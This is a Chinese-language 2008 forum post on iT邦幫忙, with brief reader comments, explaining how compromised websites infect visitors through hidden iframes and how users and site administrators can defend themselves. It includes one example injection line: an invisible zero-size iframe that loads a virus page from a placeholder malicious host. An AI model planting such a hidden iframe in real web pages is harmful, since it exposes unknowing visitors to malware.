iT邦幫忙

19

不小心連到一些被入侵的網站,是否會因此受害而成為殭屍電腦?

  • 分享至 

  • xImage
  •  

一般使用者瀏覽各種網站時,往往不清楚哪些是具有惡意企圖的或遭到入侵的。當我們連到一些被入侵的網站,由於該站已經有外來者介入,我們不清楚他們是否有其他企圖,在這種情況下,所使用的這臺電腦是否會因此受到侵害而成為僵屍電腦?
有可能。如果被入侵的網站的網頁被殖入惡意程式,當你不慎去瀏覽到它,並且自己的電腦也剛好有它可利用的弱點,那你就有可能也會被入侵,被入侵之後,當然就有可能成為殭屍電腦。

早期的入侵都是很直接的,例如針對使用者電腦上的弱點攻擊,或是用電子郵件寄一封病毒信過去。當使用者或是企業開始裝防火牆之後,有些攻擊慢慢行不通了,因為會被防火牆擋掉。但是很少有防火牆敢擋HTTP流量,所以經由HTTP 連線的入侵逐漸變成一種顯學,之後各種瀏覽器相關的漏洞也慢慢地被發掘出來。

這種入侵模式一般來說是這樣的:一、先是伺服器被入侵, 二、伺服器被殖入惡意連結,三、藉由網站的點閱大量感染其他的使用者電腦。

通常破壞者(crackers)會選一個高人氣的網站,想法子入侵它,之後偷偷地在這個網站的首頁或是使用者容易點到的網頁裡加上自己的惡意連結,例如像下面這樣:

<iframe src="http://www.OOvirusXX.com/virus.htm" width="0" height="0" frameborder="0"></iframe>

因為瀏覽器對 iframe 的內容通常是自動載入,而且破壞者把網頁的寬度(width)和高度(height)都設為0,所以一般使用者的瀏覽器不會顯示這個iframe的內容,不小心瀏覽到這部分網頁的使用者,就會不知不覺地被執行了virus.htm。如果使用者的電腦剛好有漏洞可以被virus.htm利用,並且防毒軟體也沒有即時攔下來,那使用者就會被感染。反之,如果使用者的電腦已經更新這個弱點的修補程式,或是他電腦的防毒軟體能夠偵測到,就可以倖免。

在網頁的應用上,早期這種寬度與高度為0的iframe,通常拿來做為一些無害的特殊用途,例如:當作計數器,或是執行不想讓使用者看到的背景程式.。但近年來卻被破壞者用來當作掛入惡意連結的跳板。

值得一提的還有︰virus.htm的內容很有可能經過了多重的編碼,如果不解譯到最裡面一層,通常不容易偵測到病毒,這也增加了防毒軟體的一些困難。

如果是點閱率很高的網站遭到入侵,且它的惡意連結所使用的弱點或漏洞到目前為止都還沒有「補丁」(即所謂的Zero-day弱點),也就是說,只開啟有惡意連結的網頁就會中毒,在這種情況下,這些破壞者就可以在短時間之內造成大規模的使用者電腦感染。所以弱點的修補其實是軟體廠商與破壞者之間的一場速度競賽。

使用者電腦被感染之後,破壞者通常會想要幾種東西:一、密碼,二、你親朋好友的電子郵件位址,三、機密資料。

有了你的密碼,就可以去試著入侵你其他的主機;得到你親朋好友的電子郵件位址之後,就能偽裝成你去寄病毒信給他們(這樣他們會比較容易中毒);而竊取到一些特殊的機密資料後,就可以讓破壞者獲得特殊的利益等等。這年頭病毒已經不流行「搞當」人家的電腦了,都是要「和解共生」、「蠶食鯨吞」。

通常遭入侵的人操作電腦時不太有感覺。對使用者來說,倒是有一些措施可以降低藉著瀏覽網頁被入侵的機率,那就是打開Windows XP SP2 的資料防止執行(DEP)、時常更新作業系統的修補程式、安裝那些病毒碼更新頻率高的的防毒軟體等,除非破壞者使用的弱點還在zero-day期間,要不然通常只要Windows來得及更新,應該就沒問題。

如果說現在的網路是「不知者無懼」的世界,或許不為過。因為大部分的入侵都是無痛的,大部分的被入侵者也都不知道自己已經被入侵,都得倚靠防毒軟體更新了病毒碼之後,才有機會偵測得到。因為,只要你用網際網路,就無法百分之百避免遭到入侵,所以最近開始有些人流行用虛擬機器(virtual machine)上網,個人資料不再放在虛擬機器上,這樣,就算被入侵也是虛擬機被入侵,也不會傷害到自己的真實電腦,或許大家也可以參考使用。

對於架設網站的管理員來說,除了維持網站的正常運作外,還要時常檢查是否遭入侵、被插入惡意連結、被當成入侵使用者的媒介。把你的網站弄「當」,對入侵者來說沒什麼好處,搞不好入侵者比你還在乎網站是否正常地運作,諷刺的是,他們也要確保植入的惡意連結,能讓無辜的使用者執行到。

最近有種設備叫做 網頁應用程式防火牆 最主要是要防止網頁被入侵,它主要是監控網頁表單上的各種欄位的長度上限,避免因為程式開發的疏忽,使得被入侵的可能性大增。理論上它應該可以幫上管理員一些忙。

記得大學教網路的老師說過:「網路管理到最後會變成是對人的管理,因為網路所連結的電腦的前面都坐著一個人。」只是,人心險惡阿,不是嗎?

必須很真誠地告訴各位,現在網路不安全,就算看個網頁都有機會被入侵。


圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中
0
john651216
iT邦研究生 1 級 ‧ 2008-03-30 11:46:20

很有幫助的分享,謝謝提出

0
5min
iT邦好手 3 級 ‧ 2008-04-20 17:00:43

謝謝分享

0
海綿寶寶
iT邦大神 1 級 ‧ 2008-04-23 23:06:06

小心駛得萬年船

0
skite
iT邦大師 5 級 ‧ 2008-04-24 21:02:53

之前曾幫一位變成僵屍電腦的用戶修過電腦,剛開始沒用多久就被遠端桌面登出了,後來還是拔掉網路線才能好好整理,結果掃出1千多隻病毒…

0
fanylu60
iT邦研究生 1 級 ‧ 2008-04-26 16:37:59

感謝提供分享

0
yce701116
iT邦研究生 1 級 ‧ 2008-04-26 16:52:15

感謝分享這個資訊

0
plutosrita
iT邦研究生 1 級 ‧ 2008-05-04 10:50:11

謝謝分享

0
tyc1220
iT邦研究生 1 級 ‧ 2008-05-15 02:27:47

謝謝分享

我要留言

立即登入留言